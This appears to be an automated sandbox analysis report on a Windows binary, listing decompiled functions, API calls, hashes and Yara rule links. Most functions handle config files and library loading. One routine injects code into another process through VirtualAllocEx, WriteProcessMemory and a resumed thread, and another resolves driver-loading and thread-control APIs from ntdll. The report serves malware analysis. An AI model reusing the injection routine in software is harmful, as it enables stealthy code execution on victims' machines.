Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58

Uniqueness

Uniqueness Score: -1.00%

Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t22;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed
				return _t22;
			}

0x00402f3a
0x00402f51
0x00402f60
0x00402f6f
0x00402f78
0x00402f7a
0x00402f7a
0x00402f8a
0x00402f8f
0x00402f94
0x00402f99
0x00402f9e
0x00402f9f
0x00402fad
0x00402fb2
0x00402fb2
0x00402fbd
0x00402fc5

APIs

memset.MSVCRT ref: 00402F51

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

wcsrchr.MSVCRT ref: 00402F6F
wcscat.MSVCRT ref: 00402F8A

Strings

.cfg, xrefs: 00402F84

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamememsetwcscatwcsrchr
String ID: .cfg
API String ID: 776488737-3410578098
Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C

Uniqueness

Uniqueness Score: -1.00%

Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}

0x00409ddc
0x00409de4
0x00409df0
0x00409df5
0x00409df6
0x00409e03
0x00409e05
0x00409e06
0x00409e3b
0x00409e5d
0x00409e6a
0x00409e73
0x00409e75
0x00409e08
0x00409e08
0x00409e19
0x00409e37
0x00409e37
0x00409e81

APIs

memset.MSVCRT ref: 00409E08

Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184

WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
memset.MSVCRT ref: 00409E3B
GetPrivateProfileStringW.KERNEL32 ref: 00409E5D

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
String ID:
API String ID: 1127616056-0
Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}

0x00404951
0x00404952
0x00404956
0x004049a1
0x00404958
0x00404959
0x0040495b
0x0040495b
0x0040495f
0x00404961
0x00404963
0x0040496d
0x00404975
0x00404977
0x0040497b
0x00404985
0x0040498a
0x0040498e
0x00404993
0x0040499d
0x0040499d

APIs

malloc.MSVCRT ref: 0040496D
memcpy.MSVCRT ref: 00404985
free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E

Strings

W@, xrefs: 0040495B

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: freemallocmemcpy
String ID: W@
API String ID: 3056473165-1729568415
Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}

0x0040543f
0x00405456
0x00405462
0x00405467
0x0040546d
0x00405478
0x00405489
0x0040548d
0x00000000
0x00405492
0x00405496

APIs

memset.MSVCRT ref: 00405456

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8

wcscat.MSVCRT ref: 00405478
LoadLibraryW.KERNELBASE(00000000), ref: 00405489
LoadLibraryW.KERNEL32(?), ref: 00405492

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
String ID:
API String ID: 3725422290-0
Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8

Uniqueness

Uniqueness Score: -1.00%

Function 00409E82, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetPrivateProfileIntW.KERNEL32 ref: 00409EA9

Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$StringWrite_itowmemset
String ID:
API String ID: 4232544981-0
Opcode ID: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
Instruction ID: 9cbd54488ddde29c65bb9f464d3594e5c231a9cc3fc51dd6b87f783e4d357368
Opcode Fuzzy Hash: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
Instruction Fuzzy Hash: CDE0B632000209FFDF125F80EC01AAA3B66FF14315F648569F95814171D33799B0EF88

Uniqueness

Uniqueness Score: -1.00%

Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}

0x00408f4c
0x00408f57
0x00408f60
0x00408f62
0x00408f67
0x00408f67
0x00408f71

APIs

Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA

FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentErrorFreeLastLibraryProcess
String ID:
API String ID: 187924719-0
Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694

Uniqueness

Uniqueness Score: -1.00%

Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}

0x004098fa
0x004098fc
0x00409901
0x00409907
0x00000000
0x0040991c
0x00409918
0x00000000

APIs

Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971

K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$FileModuleName
String ID:
API String ID: 3859505661-0
Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208

Uniqueness

Uniqueness Score: -1.00%

Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}

0x004095da
0x004095da
0x004095de
0x004095e1
0x004095e7
0x004095e7
0x004095ee
0x004095fc

APIs

FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}

0x0040a3d0
0x0040a3d9

APIs

EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}

0x00408e38
0x00408e44
0x00408e56
0x00408e68
0x00408e7a
0x00408e8c
0x00408e9e
0x00408eb0
0x00408ec2
0x00408ed4
0x00408ee6
0x00408ef8
0x00408f0a
0x00408f1c
0x00408f21
0x00408f23
0x00000000
0x00408f28
0x00408f29

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21

Strings

NtResumeThread, xrefs: 00408EFF
NtOpenSymbolicLinkObject, xrefs: 00408E81
NtOpenThread, xrefs: 00408EB7
NtSuspendThread, xrefs: 00408EED
NtTerminateThread, xrefs: 00408F11
ntdll.dll, xrefs: 00408E3F
NtLoadDriver, xrefs: 00408E5D
NtUnloadDriver, xrefs: 00408E6F
NtClose, xrefs: 00408EC9
NtQuerySymbolicLinkObject, xrefs: 00408E93
NtQuerySystemInformation, xrefs: 00408E50
NtQueryInformationThread, xrefs: 00408EDB
NtQueryObject, xrefs: 00408EA5

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
API String ID: 667068680-4280973841
Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

0x0040a474
0x0040a47b
0x0040a48a
0x0040a48d
0x0040a48f
0x0040a497
0x0040a49a
0x0040a6f7
0x0040a6f9
0x0040a700
0x0040a700
0x0040a4ad
0x0040a4b3
0x0040a4b8
0x0040a4c6
0x0040a4cc
0x0040a4cf
0x0040a4dd
0x0040a4e2
0x0040a4e3
0x0040a4ea
0x0040a4e5
0x0040a4e5
0x0040a4e5
0x0040a4ec
0x0040a4f6
0x0040a4fe
0x0040a503
0x0040a504
0x0040a50b
0x0040a506
0x0040a506
0x0040a506
0x0040a50d
0x0040a512
0x0040a518
0x0040a51c
0x0040a523
0x0040a523
0x0040a523
0x0040a528
0x0040a537
0x0040a54c
0x0040a539
0x0040a544
0x0040a549
0x0040a558
0x0040a56d
0x0040a55a
0x0040a565
0x0040a56a
0x0040a579
0x0040a591
0x0040a57b
0x0040a589
0x0040a58e
0x0040a5b4
0x0040a5b7
0x0040a5cc
0x0040a5cf
0x0040a5d4
0x0040a5d7
0x0040a6ed
0x0040a5e5
0x0040a5fa
0x0040a60b
0x0040a61a
0x0040a620
0x0040a623
0x0040a62b
0x0040a62f
0x0040a632
0x0040a659
0x0040a634
0x0040a635
0x0040a641
0x0040a648
0x0040a648
0x0040a668
0x0040a66e
0x0040a685
0x0040a69e
0x0040a6a8
0x0040a6ad
0x0040a6bd
0x0040a6c5
0x0040a6c8
0x0040a6d0
0x0040a6d1
0x0040a6d2
0x0040a6d3
0x0040a6d3
0x0040a6c8
0x0040a6d7
0x0040a6dc
0x0040a6dc
0x0040a6d7
0x00000000

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
memset.MSVCRT ref: 0040A4B3
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0

Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1

GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
